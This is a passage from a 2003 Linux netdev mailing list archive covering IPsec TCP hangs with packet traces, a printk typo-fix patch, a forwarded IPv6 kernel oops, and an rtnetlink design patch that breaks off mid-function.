34221, len 72) 19:55:25.928358 192.168.0.3 > 192.168.0.1: ESP(spi=0x06e9543a,seq=0x1132f) (DF) (ttl 64, id 34222, len 72) 19:55:26.127301 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c59bc9d,seq=0x1) (DF) (ttl 64, id 5516, len 1496) 19:55:26.127706 192.168.0.3 > 192.168.0.1: ESP(spi=0x039c0c62,seq=0x1) (DF) (ttl 64, id 34223, len 88) 19:55:26.128128 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c59bc9d,seq=0x2) (DF) (ttl 64, id 5517, len 1496) 19:55:26.128401 192.168.0.3 > 192.168.0.1: ESP(spi=0x039c0c62,seq=0x2) (DF) (ttl 64, id 34224, len 72) 19:55:26.128276 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c59bc9d,seq=0x3) (DF) (ttl 64, id 5518, len 1496) 19:55:26.128657 192.168.0.3 > 192.168.0.1: ESP(spi=0x039c0c62,seq=0x3) (DF) (ttl 64, id 34225, len 72) 19:55:26.128423 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c59bc9d,seq=0x4) (DF) (ttl 64, id 5519, len 1496) 19:55:26.128925 192.168.0.3 > 192.168.0.1: ESP(spi=0x039c0c62,seq=0x4) (DF) (ttl 64, id 34226, len 72) 19:55:26.128844 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c59bc9d,seq=0x5) (DF) (ttl 64, id 5520, len 1496) 19:55:26.129219 192.168.0.3 > 192.168.0.1: ESP(spi=0x039c0c62,seq=0x5) (DF) (ttl 64, id 34227, len 72) 19:55:26.128982 192.168.0.1 > 
192.168.0.3: ESP(spi=0x0c59bc9d,seq=0x6) (DF) (ttl 64, id 5521, len 1496) 19:55:26.129507 192.168.0.3 > 192.168.0.1: ESP(spi=0x039c0c62,seq=0x6) (DF) (ttl 64, id 34228, len 72) 19:55:26.129157 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c59bc9d,seq=0x7) (DF) (ttl 64, id 5522, len 1496) 19:55:26.129772 192.168.0.3 > 192.168.0.1: ESP(spi=0x039c0c62,seq=0x7) (DF) (ttl 64, id 34229, len 72) 19:55:26.129304 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c59bc9d,seq=0x8) (DF) (ttl 64, id 5523, len 1496) 19:55:26.130060 192.168.0.3 > 192.168.0.1: ESP(spi=0x039c0c62,seq=0x8) (DF) (ttl 64, id 34230, len 72) 19:55:26.129477 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c59bc9d,seq=0x9) (DF) (ttl 64, id 5524, len 1496) 19:55:26.130349 192.168.0.3 > 192.168.0.1: ESP(spi=0x039c0c62,seq=0x9) (DF) (ttl 64, id 34231, len 72) 19:55:26.129629 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c59bc9d,seq=0xa) (DF) (ttl 64, id 5525, len 1496) 19:55:26.130615 192.168.0.3 > 192.168.0.1: ESP(spi=0x039c0c62,seq=0xa) (DF) (ttl 64, id 34232, len 72) 19:55:26.129807 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c59bc9d,seq=0xb) (DF) (ttl 64, id 5526, len 1496) 19:55:26.130898 192.168.0.3 > 192.168.0.1: ESP(spi=0x039c0c62,seq=0xb) (DF) (ttl 64, id 34233, len 72) 19:55:26.129963 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c59bc9d,seq=0xc) (DF) (ttl 64, id 5527, len 1496) 19:55:26.131256 192.168.0.3 > 192.168.0.1: ESP(spi=0x039c0c62,seq=0xc) (DF) (ttl 64, id 34234, len 72) 19:55:26.130140 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c59bc9d,seq=0xd) (DF) (ttl 64, id 5528, len 1496) 19:55:26.131570 192.168.0.3 > 192.168.0.1: ESP(spi=0x039c0c62,seq=0xd) (DF) (ttl 64, id 34235, len 72) 19:55:26.130288 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c59bc9d,seq=0xe) (DF) (ttl 64, id 5529, len 1496) 19:55:26.131875 192.168.0.3 > 192.168.0.1: ESP(spi=0x039c0c62,seq=0xe) (DF) (ttl 64, id 34236, len 72) 19:55:26.130503 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c59bc9d,seq=0xf) (DF) (ttl 64, id 5530, len 1496) 19:55:26.132186 192.168.0.3 > 192.168.0.1: 
ESP(spi=0x039c0c62,seq=0xf) (DF) (ttl 64, id 34237, len 72) 19:55:26.130648 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c59bc9d,seq=0x10) (DF) (ttl 64, id 5531, len 1496) 19:55:26.132578 192.168.0.3 > 192.168.0.1: ESP(spi=0x039c0c62,seq=0x10) (DF) (ttl 64, id 34238, len 72) 19:55:26.130815 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c59bc9d,seq=0x11) (DF) (ttl 64, id 5532, len 1496) 19:55:26.130969 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c59bc9d,seq=0x12) (DF) (ttl 64, id 5533, len 1496) 19:55:26.131137 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c59bc9d,seq=0x13) (DF) (ttl 64, id 5534, len 1496) 19:55:26.131292 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c59bc9d,seq=0x14) (DF) (ttl 64, id 5535, len 1496) 19:55:26.131452 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c59bc9d,seq=0x15) (DF) (ttl 64, id 5536, len 1496) 19:55:26.131624 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c59bc9d,seq=0x16) (DF) (ttl 64, id 5537, len 1496) 19:55:26.131780 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c59bc9d,seq=0x17) (DF) (ttl 64, id 5538, len 1496) 19:55:26.131935 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c59bc9d,seq=0x18) (DF) (ttl 64, id 5539, len 1496) 19:55:26.132089 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c59bc9d,seq=0x19) (DF) (ttl 64, id 5540, len 1496) 19:55:26.132241 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c59bc9d,seq=0x1a) (DF) (ttl 64, id 5541, len 1496) 19:55:26.132429 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c59bc9d,seq=0x1b) (DF) (ttl 64, id 5542, len 1496) 19:55:26.132562 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c59bc9d,seq=0x1c) (DF) (ttl 64, id 5543, len 1496) 19:55:26.132727 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c59bc9d,seq=0x1d) (DF) (ttl 64, id 5544, len 1496) 19:55:26.132878 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c59bc9d,seq=0x1e) (DF) (ttl 64, id 5545, len 1496) 19:55:26.133034 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c59bc9d,seq=0x1f) (DF) (ttl 64, id 5546, len 1496) 19:55:26.133183 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c59bc9d,seq=0x20) (DF) (ttl 64, id 5547, len 1496) 19:55:26.133336 192.168.0.1 > 192.168.0.3: 
ESP(spi=0x0c59bc9d,seq=0x21) (DF) (ttl 64, id 5548, len 1496)
19:55:26.137285 192.168.0.3 > 192.168.0.1: ESP(spi=0x039c0c62,seq=0x11) (DF) (ttl 64, id 34239, len 72)
19:55:26.137532 192.168.0.3 > 192.168.0.1: ESP(spi=0x039c0c62,seq=0x12) (DF) (ttl 64, id 34240, len 72)

From sneakums@zork.net Sun Jul 20 12:47:26 2003
Received: with ECARTIS (v1.0.0; list netdev); Sun, 20 Jul 2003 12:47:32 -0700 (PDT)
Received: from zork.zork.net (mail@zork.zork.net [64.81.246.102]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6KJlPFl006326 for ; Sun, 20 Jul 2003 12:47:26 -0700
Received: from sneakums by zork.zork.net with local (Exim 3.35 #1 (Debian)) id 19eK9N-00055k-00; Sun, 20 Jul 2003 12:47:17 -0700
To: James Morris
Cc: netdev@oss.sgi.com,
Subject: Re: [2.6.0-test1-mm1] TCP connections over ipsec hang after a few seconds
References: <6uwued6lzv.fsf@zork.zork.net>
From: Sean Neakums
Mail-Followup-To: James Morris , netdev@oss.sgi.com,
Date: Sun, 20 Jul 2003 20:47:17 +0100
In-Reply-To: <6uwued6lzv.fsf@zork.zork.net> (Sean Neakums's message of "Sun, 20 Jul 2003 20:23:16 +0100")
Message-ID: <6usmp16kvu.fsf@zork.zork.net>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
X-archive-position: 4192
X-ecartis-version: Ecartis v1.0.0
Sender: netdev-bounce@oss.sgi.com
Errors-to: netdev-bounce@oss.sgi.com
X-original-sender: sneakums@zork.net
Precedence: bulk
X-list: netdev

Sean Neakums writes:

> I ended up with about forty megabytes of tcpdump output on each side
> of the link before the hang occurred. I've appended below the last
> 150 lines of each dump. Four separate TCP connections were involved
> in all, for a total of about 400MiB of data transferred.

That is to say: the tree of files I was rsyncing is about 125MiB, and I deleted the destination tree and repeated the transfer until I reproduced the hang.

From sneakums@zork.net Sun Jul 20 14:20:27 2003
Received: with ECARTIS (v1.0.0; list netdev); Sun, 20 Jul 2003 14:20:35 -0700 (PDT)
Received: from zork.zork.net (mail@zork.zork.net [64.81.246.102]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6KLKQFl015370 for ; Sun, 20 Jul 2003 14:20:26 -0700
Received: from sneakums by zork.zork.net with local (Exim 3.35 #1 (Debian)) id 19eLbW-0002Wa-00; Sun, 20 Jul 2003 14:20:26 -0700
To: netdev@oss.sgi.com
Subject: [PATCH] correct 'discvovery' typo
From: Sean Neakums
Mail-Followup-To: netdev@oss.sgi.com
Date: Sun, 20 Jul 2003 22:20:26 +0100
Message-ID: <6ubrvo7v51.fsf@zork.zork.net>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
X-archive-position: 4193
X-ecartis-version: Ecartis v1.0.0
Sender: netdev-bounce@oss.sgi.com
Errors-to: netdev-bounce@oss.sgi.com
X-original-sender: sneakums@zork.net
Precedence: bulk
X-list: netdev

Against 2.6.0-test1.

diff --exclude '*~' -urN T1/net/ipv4/ah4.c T1.edit/net/ipv4/ah4.c
--- T1/net/ipv4/ah4.c	2003-07-14 04:37:32.000000000 +0100
+++ T1.edit/net/ipv4/ah4.c	2003-07-20 22:11:23.000000000 +0100
@@ -232,7 +232,7 @@
 	x = xfrm_state_lookup((xfrm_address_t *)&iph->daddr, ah->spi, IPPROTO_AH, AF_INET);
 	if (!x)
 		return;
-	printk(KERN_DEBUG "pmtu discvovery on SA AH/%08x/%08x\n",
+	printk(KERN_DEBUG "pmtu discovery on SA AH/%08x/%08x\n",
 	       ntohl(ah->spi), ntohl(iph->daddr));
 	xfrm_state_put(x);
 }
diff --exclude '*~' -urN T1/net/ipv4/esp4.c T1.edit/net/ipv4/esp4.c
--- T1/net/ipv4/esp4.c	2003-07-14 04:34:43.000000000 +0100
+++ T1.edit/net/ipv4/esp4.c	2003-07-20 22:11:18.000000000 +0100
@@ -425,7 +425,7 @@
 	x = xfrm_state_lookup((xfrm_address_t *)&iph->daddr, esph->spi, IPPROTO_ESP, AF_INET);
 	if (!x)
 		return;
-	printk(KERN_DEBUG "pmtu discvovery on SA ESP/%08x/%08x\n",
+	printk(KERN_DEBUG "pmtu discovery on SA ESP/%08x/%08x\n",
 	       ntohl(esph->spi), ntohl(iph->daddr));
 	xfrm_state_put(x);
 }
diff --exclude '*~' -urN T1/net/ipv4/ipcomp.c T1.edit/net/ipv4/ipcomp.c
--- T1/net/ipv4/ipcomp.c	2003-07-14 04:37:28.000000000 +0100
+++ T1.edit/net/ipv4/ipcomp.c	2003-07-20 22:11:21.000000000 +0100
@@ -256,7 +256,7 @@
 			      spi, IPPROTO_COMP, AF_INET);
 	if (!x)
 		return;
-	printk(KERN_DEBUG "pmtu discvovery on SA IPCOMP/%08x/%u.%u.%u.%u\n",
+	printk(KERN_DEBUG "pmtu discovery on SA IPCOMP/%08x/%u.%u.%u.%u\n",
 	       spi, NIPQUAD(iph->daddr));
 	xfrm_state_put(x);
 }
diff --exclude '*~' -urN T1/net/ipv6/ah6.c T1.edit/net/ipv6/ah6.c
--- T1/net/ipv6/ah6.c	2003-07-14 04:36:31.000000000 +0100
+++ T1.edit/net/ipv6/ah6.c	2003-07-20 22:11:30.000000000 +0100
@@ -364,7 +364,7 @@
 	if (!x)
 		return;
 
-	printk(KERN_DEBUG "pmtu discvovery on SA AH/%08x/"
+	printk(KERN_DEBUG "pmtu discovery on SA AH/%08x/"
 			"%04x:%04x:%04x:%04x:%04x:%04x:%04x:%04x\n",
 	       ntohl(ah->spi), NIP6(iph->daddr));
 
diff --exclude '*~' -urN T1/net/ipv6/esp6.c T1.edit/net/ipv6/esp6.c
--- T1/net/ipv6/esp6.c	2003-07-14 04:35:16.000000000 +0100
+++ T1.edit/net/ipv6/esp6.c	2003-07-20 22:11:28.000000000 +0100
@@ -317,7 +317,7 @@
 	x = xfrm_state_lookup((xfrm_address_t *)&iph->daddr, esph->spi, IPPROTO_ESP, AF_INET6);
 	if (!x)
 		return;
-	printk(KERN_DEBUG "pmtu discvovery on SA ESP/%08x/"
+	printk(KERN_DEBUG "pmtu discovery on SA ESP/%08x/"
 			"%04x:%04x:%04x:%04x:%04x:%04x:%04x:%04x\n",
 	       ntohl(esph->spi), NIP6(iph->daddr));
 	xfrm_state_put(x);
diff --exclude '*~' -urN T1/net/ipv6/ipcomp6.c T1.edit/net/ipv6/ipcomp6.c
--- T1/net/ipv6/ipcomp6.c	2003-07-14 04:34:31.000000000 +0100
+++ T1.edit/net/ipv6/ipcomp6.c	2003-07-20 22:11:25.000000000 +0100
@@ -248,7 +248,7 @@
 	if (!x)
 		return;
 
-	printk(KERN_DEBUG "pmtu discvovery on SA IPCOMP/%08x/"
+	printk(KERN_DEBUG "pmtu discovery on SA IPCOMP/%08x/"
 			"%04x:%04x:%04x:%04x:%04x:%04x:%04x:%04x\n",
 	       spi, NIP6(iph->daddr));
 	xfrm_state_put(x);

From jmorris@intercode.com.au Sun Jul 20 17:28:24 2003
Received: with ECARTIS (v1.0.0; list netdev); Sun, 20 Jul 2003 17:28:31 -0700 (PDT)
Received: from blackbird.intercode.com.au (IDENT:3VTGEz5mrUpMmXdmoRKoyjufquq16ML7@blackbird.intercode.com.au [203.32.101.10]) by oss.sgi.com
(8.12.9/8.12.9) with SMTP id h6L0SLFl023447 for ; Sun, 20 Jul 2003 17:28:22 -0700
Received: from excalibur.intercode.com.au (excalibur.intercode.com.au [203.32.101.12]) by blackbird.intercode.com.au (8.11.6p2/8.9.3) with ESMTP id h6L0S9r15427; Mon, 21 Jul 2003 10:28:10 +1000
Date: Mon, 21 Jul 2003 10:28:09 +1000 (EST)
From: James Morris
To: Sean Neakums
cc: netdev@oss.sgi.com,
Subject: Re: [2.6.0-test1-mm1] TCP connections over ipsec hang after a few seconds
In-Reply-To: <6uwued6lzv.fsf@zork.zork.net>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
X-archive-position: 4194
X-ecartis-version: Ecartis v1.0.0
Sender: netdev-bounce@oss.sgi.com
Errors-to: netdev-bounce@oss.sgi.com
X-original-sender: jmorris@intercode.com.au
Precedence: bulk
X-list: netdev

On Sun, 20 Jul 2003, Sean Neakums wrote:

> > With the 100baseT configuration, are the systems on the same segment?
>
> I'm connecting the two machines with a crossed-over cable.

I can't see anything strange here. Can you confirm that you are seeing the pmtu messages for the crossover cable case? If not, perhaps try manual configuration to rule out any racoon issues.

- James
--
James Morris

From jmorris@intercode.com.au Sun Jul 20 17:35:57 2003
Received: with ECARTIS (v1.0.0; list netdev); Sun, 20 Jul 2003 17:36:01 -0700 (PDT)
Received: from blackbird.intercode.com.au (IDENT:JuykiGJ5K9pLF8PY7C5sedkYn4XJAL4k@blackbird.intercode.com.au [203.32.101.10]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6L0ZsFl024106 for ; Sun, 20 Jul 2003 17:35:55 -0700
Received: from excalibur.intercode.com.au (excalibur.intercode.com.au [203.32.101.12]) by blackbird.intercode.com.au (8.11.6p2/8.9.3) with ESMTP id h6L0Zrr15489 for ; Mon, 21 Jul 2003 10:35:53 +1000
Date: Mon, 21 Jul 2003 10:35:52 +1000 (EST)
From: James Morris
To: netdev@oss.sgi.com
Subject: [IPV6 Problem in 2.6.0-test1] Unable to handle kernel paging request at virtual address 6b6b6b6b (fwd)
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
X-archive-position: 4195
X-ecartis-version: Ecartis v1.0.0
Sender: netdev-bounce@oss.sgi.com
Errors-to: netdev-bounce@oss.sgi.com
X-original-sender: jmorris@intercode.com.au
Precedence: bulk
X-list: netdev

---------- Forwarded message ----------
Date: 20 Jul 2003 20:09:51 -0400
From: Trever L. Adams
To: Linux Kernel Mailing List
Subject: [IPV6 Problem in 2.6.0-test1] Unable to handle kernel paging request at virtual address 6b6b6b6b

Jul 20 20:06:42 aurora kernel: Unable to handle kernel paging request at virtual address 6b6b6b6b
Jul 20 20:06:42 aurora kernel: printing eip:
Jul 20 20:06:42 aurora kernel: 6b6b6b6b
Jul 20 20:06:42 aurora kernel: *pde = 00000000
Jul 20 20:06:42 aurora kernel: Oops: 0000 [#1]
Jul 20 20:06:42 aurora kernel: CPU: 0
Jul 20 20:06:42 aurora kernel: EIP: 0060:[<6b6b6b6b>] Not tainted
Jul 20 20:06:42 aurora kernel: EFLAGS: 00010286
Jul 20 20:06:42 aurora kernel: EIP is at 0x6b6b6b6b
Jul 20 20:06:42 aurora kernel: eax: dca4c084 ebx: dc95ccbc ecx: dd178104 edx: cd94db40
Jul 20 20:06:42 aurora kernel: esi: dc95ccbc edi: 00000000 ebp: 00000000 esp: c3aa7cac
Jul 20 20:06:42 aurora kernel: ds: 007b es: 007b ss: 0068
Jul 20 20:06:42 aurora kernel: Process ogg123 (pid: 4504, threadinfo=c3aa6000 task=cd236080)
Jul 20 20:06:42 aurora kernel: Stack: e0984a96 dc95ccbc 00000000 00000000 c3aa7d90 cd9772a4 00000000 00000000
Jul 20 20:06:42 aurora kernel:        000005dc dc95ccbc 00000000 00000028 e0984ed1 dc95ccbc c3aa7d50 00000010
Jul 20 20:06:42 aurora kernel:        00000000 cf88e084 df7683fc 4122c000 00000001 00000001 cd236080 dc68c60c
Jul 20 20:06:42 aurora kernel: Call Trace:
Jul 20 20:06:42 aurora kernel: [] ip6_output2+0x166/0x240 [ipv6]
Jul 20 20:06:42 aurora kernel: [] ip6_xmit+0x1f1/0x370 [ipv6]
Jul 20 20:06:42 aurora kernel: [] tcp_v6_xmit+0x116/0x230 [ipv6]
Jul 20 20:06:42 aurora kernel: [] tcp_transmit_skb+0x39f/0x5a0
Jul 20 20:06:42 aurora kernel: [] tcp_connect+0x3a1/0x470
Jul 20 20:06:42 aurora kernel: [] tcp_v6_connect+0x397/0x750 [ipv6]
Jul 20 20:06:42 aurora kernel: [] inet_stream_connect+0xe8/0x210
Jul 20 20:06:42 aurora kernel: [] sys_connect+0x9b/0xd0
Jul 20 20:06:42 aurora kernel: [] sock_map_fd+0xfa/0x130
Jul 20 20:06:42 aurora kernel: [] sock_create+0x10b/0x170
Jul 20 20:06:42 aurora kernel: [] sys_socket+0x3d/0x60
Jul 20 20:06:42 aurora kernel: [] sys_socketcall+0xcd/0x2a0
Jul 20 20:06:42 aurora kernel: [] do_fcntl+0xb5/0x1a0
Jul 20 20:06:42 aurora kernel: [] sys_fcntl64+0x79/0xc0
Jul 20 20:06:43 aurora kernel: [] sysenter_past_esp+0x52/0x71
Jul 20 20:06:43 aurora kernel:
Jul 20 20:06:43 aurora kernel: Code: Bad EIP value.

System is nVideo nForce 2 based motherboard running a mostly RedHat Rawhide (up to date) with 2.6.0-test rpms by arjanv at RedHat.

Trever
--
"Having Microsoft give us advice on open standards is like W.C. Fields giving moral advice to the Mormon Tabernacle Choir" -- Scott McNealy, Sun Microsystems Inc.

-
To unsubscribe from this list: send the line "unsubscribe linux-kernel" in
the body of a message to majordomo@vger.kernel.org
More majordomo info at http://vger.kernel.org/majordomo-info.html
Please read the FAQ at http://www.tux.org/lkml/

From sneakums@zork.net Sun Jul 20 17:37:11 2003
Received: with ECARTIS (v1.0.0; list netdev); Sun, 20 Jul 2003 17:37:16 -0700 (PDT)
Received: from zork.zork.net (mail@zork.zork.net [64.81.246.102]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6L0bAFl024432 for ; Sun, 20 Jul 2003 17:37:11 -0700
Received: from sneakums by zork.zork.net with local (Exim 3.35 #1 (Debian)) id 19eOfp-0004Y4-00; Sun, 20 Jul 2003 17:37:05 -0700
To: James Morris
Cc: netdev@oss.sgi.com,
Subject: Re: [2.6.0-test1-mm1] TCP connections over ipsec hang after a few seconds
References:
From: Sean Neakums
Mail-Followup-To: James Morris , netdev@oss.sgi.com,
Date: Mon, 21 Jul 2003 01:37:05 +0100
In-Reply-To: (James Morris's message of "Mon, 21 Jul 2003 10:28:09 +1000 (EST)")
Message-ID: <6uu19g67gu.fsf@zork.zork.net>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
X-archive-position: 4196
X-ecartis-version: Ecartis v1.0.0
Sender: netdev-bounce@oss.sgi.com
Errors-to: netdev-bounce@oss.sgi.com
X-original-sender: sneakums@zork.net
Precedence: bulk
X-list: netdev

James Morris writes:

> On Sun, 20 Jul 2003, Sean Neakums wrote:
>
>> > With the 100baseT configuration, are the systems on the same segment?
>>
>> I'm connecting the two machines with a crossed-over cable.
>
> I can't see anything strange here. Can you confirm that you are seeing
> the pmtu messages for the crossover cable case? If not, perhaps try
> manual configuration to rule out any racoon issues.

Yes. I checked the logs after I did the recreation, and the pmtu messages are definitely showing up in the crossover case. Will retry with manual config.

From kuznet@ms2.inr.ac.ru Sun Jul 20 17:50:21 2003
Received: with ECARTIS (v1.0.0; list netdev); Sun, 20 Jul 2003 17:50:29 -0700 (PDT)
Received: from dub.inr.ac.ru (dub.inr.ac.ru [193.233.7.105]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6L0oJFl025247 for ; Sun, 20 Jul 2003 17:50:20 -0700
Received: (from kuznet@localhost) by dub.inr.ac.ru (8.6.13/ANK) id EAA31237; Mon, 21 Jul 2003 04:49:56 +0400
From: kuznet@ms2.inr.ac.ru
Message-Id: <200307210049.EAA31237@dub.inr.ac.ru>
Subject: Re: [PATCH 2/2] Prefix List and O/M flags against 2.5.73
To: yoshfuji@linux-ipv6.org (YOSHIFUJIHideaki/=?iso-2022-jp?B?GyRCNUhGIzFRTEAbKEI=?=)
Date: Mon, 21 Jul 2003 04:49:55 +0400 (MSD)
Cc: krkumar@us.ibm.com, davem@redhat.com, netdev@oss.sgi.com, linux-net@vger.kernel.org
In-Reply-To: <20030719.093316.45294671.yoshfuji@linux-ipv6.org> from "YOSHIFUJIHideaki/=?iso-2022-jp?B?GyRCNUhGIzFRTEAbKEI=?=" at Jul 19, 2003 09:33:16 AM
X-Mailer: ELM [version 2.5 PL6]
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
X-archive-position: 4197
X-ecartis-version: Ecartis v1.0.0
Sender: netdev-bounce@oss.sgi.com
Errors-to: netdev-bounce@oss.sgi.com
X-original-sender: kuznet@ms2.inr.ac.ru
Precedence: bulk
X-list: netdev

Hello!

> First part (prefixlist) seems ok to me.

The same is here. It looks good.

> Second part does not.

I do not like the latest version a lot. :-)

Actually, previous one was quite acceptable, but I think Yoshfuji's suggestion is so good that it makes lots of sense to complete it.

I could make this in IPv4 part, actually, I started to make it as demo for Krishna, but two questions remained unanswered:

1. How to allocate new attributes? It is bad just to add them to existing IFLA_* ones or override them. I would suggest to create new attribute IFLA_PROTINFO and to embed new protocol-dependent attributes as subattributes a la RTA_METRICS. Other suggestions?

2. IFLA_INET6_CONF (and IFLA_INET_CONF). How to encode the values? Array of ints is simple, compact and looks good. But I have some problem with it. What if one day we want to implement changing the values? It will be nasty. To forget about such perspective? Or to leave it to use for "atomic" load of all the parameters?

Alexey

From jmorris@intercode.com.au Sun Jul 20 18:02:44 2003
Received: with ECARTIS (v1.0.0; list netdev); Sun, 20 Jul 2003 18:02:50 -0700 (PDT)
Received: from blackbird.intercode.com.au (IDENT:3f75iEePdAAYnJaYIP6M0dAnkzC2j9O0@blackbird.intercode.com.au [203.32.101.10]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6L12fFl026090 for ; Sun, 20 Jul 2003 18:02:42 -0700
Received: from excalibur.intercode.com.au (excalibur.intercode.com.au [203.32.101.12]) by blackbird.intercode.com.au (8.11.6p2/8.9.3) with ESMTP id h6L12ar15602; Mon, 21 Jul 2003 11:02:36 +1000
Date: Mon, 21 Jul 2003 11:02:35 +1000 (EST)
From: James Morris
To: Sean Neakums
cc: netdev@oss.sgi.com
Subject: Re: [PATCH] correct 'discvovery' typo
In-Reply-To: <6ubrvo7v51.fsf@zork.zork.net>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
X-archive-position: 4198
X-ecartis-version: Ecartis v1.0.0
Sender: netdev-bounce@oss.sgi.com
Errors-to: netdev-bounce@oss.sgi.com
X-original-sender: jmorris@intercode.com.au
Precedence: bulk
X-list: netdev

On Sun, 20 Jul 2003, Sean Neakums wrote:

> Against 2.6.0-test1.

Applied to bk://kernel.bkbits.net/jmorris/net-2.5

--
James Morris

From kuznet@ms2.inr.ac.ru Sun Jul 20 18:55:22 2003
Received: with ECARTIS (v1.0.0; list netdev); Sun, 20 Jul 2003 18:55:32 -0700 (PDT)
Received: from dub.inr.ac.ru (dub.inr.ac.ru [193.233.7.105]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6L1tKFl028808 for ; Sun, 20 Jul 2003 18:55:21 -0700
Received: (from kuznet@localhost) by dub.inr.ac.ru (8.6.13/ANK) id FAA31320; Mon, 21 Jul 2003 05:55:05 +0400
From: kuznet@ms2.inr.ac.ru
Message-Id: <200307210155.FAA31320@dub.inr.ac.ru>
Subject: Re: [PATCH 2/2] Prefix List and O/M flags against 2.4.21
To: krkumar@us.ibm.com (Krishna Kumar)
Date: Mon, 21 Jul 2003 05:55:04 +0400 (MSD)
Cc: yoshfuji@linux-ipv6.org, krkumar@us.ibm.com, davem@redhat.com, netdev@oss.sgi.com, linux-net@vger.kernel.org
In-Reply-To: <3F17245D.9040806@us.ibm.com> from "Krishna Kumar" at Jul 17, 2003 03:34:05 PM
X-Mailer: ELM [version 2.5 PL6]
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
X-archive-position: 4199
X-ecartis-version: Ecartis v1.0.0
Sender: netdev-bounce@oss.sgi.com
Errors-to: netdev-bounce@oss.sgi.com
X-original-sender: kuznet@ms2.inr.ac.ru
Precedence: bulk
X-list: netdev

Hello!

> I don't
> have any knowledge of using this new interface.

Something like this. See?

I just substitute into xxx_rtnetlink_table() entry for RTM_GETLINK with IPv4 specific function which outputs the same message, but, maybe, with some attributes removed and with new protocol-specific attribute.

The patch is not quite complete: except for those two questions,
I forgot to add MTU truncated to its IPv4 value, did nothing
for multicast things (I still cannot figure out, what information is
really useful) and did not add active notifications which would be good
to be made after sysctl parameters are changed.

Alexey

# This is a BitKeeper generated patch for the following project:
# Project Name: Linux kernel tree
# This patch format is intended for GNU patch command version 2.5 or higher.
# This patch includes the following deltas:
#	ChangeSet	1.1469 -> 1.1470
#	net/ipv4/devinet.c	1.19 -> 1.20
#	include/linux/rtnetlink.h	1.18 -> 1.19
#
# The following is the BitKeeper ChangeSet Log
# --------------------------------------------
# 03/07/21	kuznet@oops.inr.ac.ru	1.1470
# Reporting INET config via rtnetlink
# --------------------------------------------
#
diff -Nru a/include/linux/rtnetlink.h b/include/linux/rtnetlink.h
--- a/include/linux/rtnetlink.h	Mon Jul 21 05:47:01 2003
+++ b/include/linux/rtnetlink.h	Mon Jul 21 05:47:01 2003
@@ -476,10 +476,12 @@
 #define IFLA_MASTER IFLA_MASTER
 	IFLA_WIRELESS,		/* Wireless Extension event - see wireless.h */
 #define IFLA_WIRELESS IFLA_WIRELESS
+	IFLA_PROTINFO,
+#define IFLA_PROTINFO IFLA_PROTINFO
 };
 
 
-#define IFLA_MAX IFLA_WIRELESS
+#define IFLA_MAX IFLA_PROTINFO
 
 #define IFLA_RTA(r)  ((struct rtattr*)(((char*)(r)) + NLMSG_ALIGN(sizeof(struct ifinfomsg))))
 #define IFLA_PAYLOAD(n) NLMSG_PAYLOAD(n,sizeof(struct ifinfomsg))
@@ -512,6 +514,16 @@
 	or maybe 0, what means, that real media is unknown (usual
 	for IPIP tunnels, when route to endpoint is allowed to change)
  */
+
+enum
+{
+	IFLA_INET_UNSPEC,
+	IFLA_INET_CONF,		/* sysctl parameters */
+	IFLA_INET_NEIGH,	/* ARP parameters */
+	IFLA_INET_MCAST,	/* MC things. What of them? */
+};
+
+#define IFLA_INET_MAX IFLA_INET_CONF
 
 /*****************************************************************
  *		Traffic control messages.
diff -Nru a/net/ipv4/devinet.c b/net/ipv4/devinet.c
--- a/net/ipv4/devinet.c	Mon Jul 21 05:47:01 2003
+++ b/net/ipv4/devinet.c	Mon Jul 21 05:47:01 2003
@@ -1008,17 +1008,88 @@
 	}
 }
 
+static int inet_fill_ifinfo(struct sk_buff *skb, struct net_device *dev,
+			    struct in_device *in_dev,
+			    int type, u32 pid, u32 seq)
+{
+	struct ifinfomsg *r;
+	struct nlmsghdr *nlh;
+	unsigned char *b = skb->tail;
+	struct rtattr *subattr;
+
